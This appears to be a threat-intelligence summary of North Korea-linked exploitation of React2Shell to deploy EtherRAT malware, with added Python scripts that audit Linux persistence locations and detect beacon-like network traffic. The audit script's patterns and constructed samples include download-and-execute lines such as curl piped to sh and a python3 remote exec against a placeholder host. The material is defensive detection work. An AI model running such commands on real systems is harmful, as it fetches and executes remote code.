
North Korea-linked Actors Exploit React2Shell to Deploy New EtherRAT Malware

Critical
Published: Tue Dec 09 2025 (12/09/2025, 18:25:00 UTC)
Source: The Hacker News

Description

Threat actors with ties to North Korea have likely become the latest to exploit the recently disclosed critical security React2Shell flaw in React Server Components (RSC) to deliver a previously undocumented remote access trojan dubbed EtherRAT. "EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution, deploys five independent Linux persistence mechanisms, and

AI-Powered Analysis

AI analysis last updated: 12/09/2025, 19:23:37 UTC

Technical Analysis

The threat actors, likely affiliated with North Korea, have leveraged the recently disclosed critical vulnerability CVE-2025-55182 (React2Shell) in React Server Components (RSC) to deploy a novel remote access trojan named EtherRAT. The vulnerability, rated CVSS 10.0, allows unauthenticated remote code execution, letting attackers run arbitrary shell commands on vulnerable servers.

The attack chain begins with a Base64-encoded shell command that downloads and runs a shell script, using curl, wget, or python3 as fallback download methods. The script prepares the environment by downloading Node.js v20.10.0 from the official source and writes an encrypted payload and an obfuscated JavaScript dropper to disk. The dropper decrypts the EtherRAT payload with a hard-coded key and launches it with the downloaded Node.js runtime.

EtherRAT’s command-and-control infrastructure relies on Ethereum smart contracts for C2 URL resolution: the implant queries nine public Ethereum RPC endpoints in parallel and takes the majority answer as the legitimate C2 server address, which protects the channel against a single compromised endpoint and against researcher takedowns. Once connected, EtherRAT polls the C2 every 500 milliseconds and executes any JavaScript command longer than 10 characters on the infected host.

Persistence is established through five distinct Linux mechanisms: systemd user services, XDG autostart entries, cron jobs, .bashrc injection, and profile injection, so the implant survives reboots. The malware also has a self-update capability that replaces its code with functionally identical but differently obfuscated versions to evade static detection.

EtherRAT is linked to the Contagious Interview campaign, which targets blockchain and Web3 developers through social engineering built around fake job interviews and coding tasks distributed via platforms such as LinkedIn, Upwork, and Fiverr. The campaign has evolved to exploit npm ecosystem vulnerabilities and now also abuses VS Code’s auto-run task feature to execute malicious scripts. Its focus on JavaScript and cryptocurrency-related workflows, combined with EtherRAT’s stealth and persistence techniques, marks a significant escalation in the capabilities of actors exploiting React2Shell.
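The five user-level persistence locations named in the analysis (systemd user services, XDG autostart entries, cron jobs, .bashrc injection and profile injection) are exactly what a host audit or an EDR rule needs to inspect. The Python script below is an added example, not code from the article or from the referenced research: it walks those locations under a given home directory, applies a few content heuristics that correspond to the behaviour described above (a Node runtime launched from a user-writable path, inline base64 decoding, curl or wget piped into a shell, a python3 download one-liner) and reports every matching line. The file paths, regular expressions and the sample entries built by demo() are assumptions and constructed data, not EtherRAT indicators.

```python
"""Audit Linux user-level persistence locations for suspicious entries.

Added example for the analysis above; paths, patterns and sample data are
assumptions, not indicators taken from the article.
"""
import re
import tempfile
from pathlib import Path

# Content heuristics, checked in order; the first match wins for a line.
SUSPICIOUS = [
    # A node binary living under a home directory rather than a system path.
    ("node-from-home", re.compile(r"(?:/home/\S+|~|\$HOME)/\S*node\b")),
    # Inline base64 decoding of an embedded blob.
    ("base64-decode", re.compile(r"\bbase64\s+(?:-d|--decode)\b")),
    # Download piped straight into a shell.
    ("download-exec", re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b")),
    # python3 used as a fallback downloader.
    ("python-fetch", re.compile(r"\bpython3?\s+-c\b.*\burllib\b")),
]


def _scan_text(mechanism, path, text):
    """Return one finding per non-comment line that matches a heuristic."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        for name, pattern in SUSPICIOUS:
            if pattern.search(stripped):
                findings.append({"mechanism": mechanism, "path": str(path),
                                 "line": lineno, "indicator": name, "text": stripped})
                break
    return findings


def audit_persistence(home, crontab_text=""):
    """Scan the five persistence locations under `home`.

    `crontab_text` is the output of `crontab -l` for that user, passed in so
    the function has no side effects and can run against collected data."""
    home = Path(home)
    findings = []
    # 1. systemd user services
    for unit in sorted((home / ".config/systemd/user").glob("*.service")):
        findings += _scan_text("systemd-user", unit, unit.read_text(errors="replace"))
    # 2. XDG autostart entries
    for entry in sorted((home / ".config/autostart").glob("*.desktop")):
        findings += _scan_text("xdg-autostart", entry, entry.read_text(errors="replace"))
    # 3. cron jobs
    findings += _scan_text("cron", "crontab", crontab_text)
    # 4 and 5. .bashrc and profile injection
    for rc in (".bashrc", ".bash_profile", ".profile", ".zshrc"):
        path = home / rc
        if path.is_file():
            findings += _scan_text("shell-profile", path, path.read_text(errors="replace"))
    return findings


def demo():
    """Build a constructed home directory with benign and suspicious entries
    and audit it. Every entry here is made up for the example."""
    with tempfile.TemporaryDirectory() as tmp:
        home = Path(tmp)
        (home / ".config/systemd/user").mkdir(parents=True)
        (home / ".config/autostart").mkdir(parents=True)
        (home / ".config/systemd/user/ssh-agent.service").write_text(
            "[Service]\nExecStart=/usr/bin/ssh-agent -D\n")
        (home / ".config/systemd/user/sync.service").write_text(
            "[Service]\nExecStart=/home/dev/.cache/.n/node /home/dev/.cache/.n/loader.js\n")
        (home / ".config/autostart/update.desktop").write_text(
            "[Desktop Entry]\nExec=sh -c 'echo aGVsbG8= | base64 -d | sh'\n")
        (home / ".bashrc").write_text(
            "alias ll='ls -l'\n$HOME/.cache/.n/node $HOME/.cache/.n/loader.js &\n")
        (home / ".profile").write_text(
            "export PATH=$HOME/bin:$PATH\n"
            "python3 -c 'import urllib.request as u; exec(u.urlopen(\"http://example.invalid/x\").read())'\n")
        crontab = ("0 3 * * * /usr/bin/backup.sh\n"
                   "*/5 * * * * curl -fsSL http://example.invalid/s | sh\n")
        return audit_persistence(home, crontab)


if __name__ == "__main__":
    for finding in demo():
        print(f"{finding['mechanism']:14} {finding['indicator']:15} {finding['path']}:{finding['line']}")
```

On a live host, replace demo() with audit_persistence(Path.home(), subprocess.check_output(["crontab", "-l"], text=True)) for each interactive user; the heuristics are deliberately broad and will flag legitimate developer setups that keep a Node toolchain under $HOME, so treat hits as triage leads rather than verdicts.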

Potential Impact

European organizations involved in software development, especially those working with JavaScript, Node.js, blockchain, and Web3 technologies, face significant risks from this threat. The exploitation of a critical unauthenticated RCE vulnerability in React Server Components can lead to full system compromise, enabling attackers to execute arbitrary code, steal sensitive intellectual property, and maintain persistent access. The use of Ethereum smart contracts for C2 resolution complicates detection and takedown efforts, increasing the likelihood of prolonged undetected intrusions. The multi-pronged persistence mechanisms ensure that even after reboots or partial remediation, the malware remains active. Organizations in sectors such as fintech, blockchain startups, software development firms, and cloud service providers are particularly vulnerable. The social engineering vector targeting developers via professional platforms increases the attack surface and the risk of initial compromise. The malware’s ability to self-update and obfuscate payloads challenges traditional signature-based defenses, potentially leading to widespread infections and data breaches. Additionally, the stealthy nature of EtherRAT and its frequent polling for commands can facilitate espionage, data exfiltration, and lateral movement within networks, severely impacting confidentiality, integrity, and availability of critical systems.

Mitigation Recommendations

European organizations should prioritize patching all React Server Components to remediate CVE-2025-55182 immediately, ensuring no vulnerable versions remain in production or development environments. Implement strict network segmentation and monitoring to detect unusual outbound connections, especially those querying Ethereum RPC endpoints or exhibiting high-frequency polling behavior. Deploy advanced endpoint detection and response (EDR) solutions capable of behavioral analysis to identify obfuscated JavaScript execution and persistence mechanisms such as systemd service creation, cron job modifications, and shell profile injections. Enforce multi-factor authentication and least privilege principles on developer platforms and internal systems to reduce the risk of credential theft and lateral movement. Conduct targeted security awareness training for developers and HR teams to recognize and report suspicious recruitment activities and social engineering attempts on platforms like LinkedIn, Upwork, and Fiverr. Utilize threat intelligence feeds to monitor for indicators of compromise related to EtherRAT and the Contagious Interview campaign. Regularly audit and harden Node.js runtime environments, restricting downloads from untrusted sources. Employ application allowlisting and script-blocking policies to prevent unauthorized execution of scripts and binaries. Finally, establish incident response playbooks specifically addressing React2Shell exploitation and Ethereum-based C2 communications to enable rapid containment and remediation.
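The network-side recommendation above, watching for high-frequency polling to one destination and for parallel queries to several RPC endpoints, can be checked from ordinary outbound connection logs. The Python below is an added example and not code from the article: it parses constructed records of the form "epoch-seconds source destination:port", flags source/destination pairs contacted at least 20 times whose median gap between connections is at or below one second (the 500 ms cadence described in the analysis would trip it), and flags a source that reaches five or more distinct destinations within any two-second window (the nine parallel RPC queries). The log format, thresholds and hostnames are assumptions.

```python
"""Flag beacon-style polling and parallel fan-out in outbound connection logs.

Added example for the mitigation section above; the log format, thresholds
and all hostnames are assumptions, and the sample records are constructed.
"""
from collections import defaultdict
from statistics import median


def build_sample_log():
    """Constructed records '<epoch seconds> <src ip> <dst host:port>'."""
    lines = []
    # Host 10.0.0.5 contacting one destination every 500 ms for 30 seconds.
    for i in range(60):
        lines.append(f"{0.5 * i:.3f} 10.0.0.5 c2.example.invalid:443")
    # The same host querying nine endpoints almost simultaneously.
    for i in range(9):
        lines.append(f"{100.0 + 0.02 * i:.3f} 10.0.0.5 rpc{i + 1}.example.invalid:443")
    # A host with ordinary sparse traffic.
    lines += [
        "5.000 10.0.0.7 updates.example.invalid:443",
        "20.000 10.0.0.7 mail.example.invalid:993",
        "65.000 10.0.0.7 updates.example.invalid:443",
        "130.000 10.0.0.7 updates.example.invalid:443",
    ]
    return lines


def parse(lines):
    """Turn log lines into (timestamp, src, dst) tuples."""
    records = []
    for line in lines:
        ts, src, dst = line.split()
        records.append((float(ts), src, dst))
    return records


def find_high_frequency_polling(records, max_median_gap_s=1.0, min_count=20):
    """Flag (src, dst) pairs seen at least min_count times whose median gap
    between consecutive connections is at or below max_median_gap_s."""
    by_pair = defaultdict(list)
    for ts, src, dst in records:
        by_pair[(src, dst)].append(ts)
    hits = []
    for (src, dst), times in by_pair.items():
        if len(times) < min_count:
            continue
        times.sort()
        gap = median(b - a for a, b in zip(times, times[1:]))
        if gap <= max_median_gap_s:
            hits.append({"src": src, "dst": dst, "count": len(times),
                         "median_gap_s": round(gap, 3)})
    return hits


def find_parallel_fanout(records, window_s=2.0, min_distinct=5):
    """Flag a source that opens connections to min_distinct or more distinct
    destinations inside any window_s-second window; reports the widest window."""
    by_src = defaultdict(list)
    for ts, src, dst in records:
        by_src[src].append((ts, dst))
    hits = []
    for src, events in by_src.items():
        events.sort()
        left, best = 0, None
        for right in range(len(events)):
            # Slide the left edge so the window never exceeds window_s.
            while events[right][0] - events[left][0] > window_s:
                left += 1
            distinct = {dst for _, dst in events[left:right + 1]}
            if len(distinct) >= min_distinct and (best is None or len(distinct) > best["distinct"]):
                best = {"src": src, "window_start": events[left][0],
                        "distinct": len(distinct), "hosts": sorted(distinct)}
        if best:
            hits.append(best)
    return hits


if __name__ == "__main__":
    recs = parse(build_sample_log())
    for hit in find_high_frequency_polling(recs):
        print("polling:", hit)
    for hit in find_parallel_fanout(recs):
        print("fan-out:", hit)
```

Both checks are rate-based rather than indicator-based, so they keep working when the C2 address resolved from the contract changes; the cost is that legitimate chatty clients (monitoring agents, CDN fan-out) will also surface, which is why the thresholds are parameters to tune per environment.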


Technical Details

Article Source: https://thehackernews.com/2025/12/north-korea-linked-actors-exploit.html (fetched 2025-12-09T19:23:18 UTC, 1549 words)

Threat ID: 69387729ef540ebbadc365b6

Added to database: 12/9/2025, 7:23:21 PM

Last enriched: 12/9/2025, 7:23:37 PM

Last updated: 12/10/2025, 8:46:31 AM
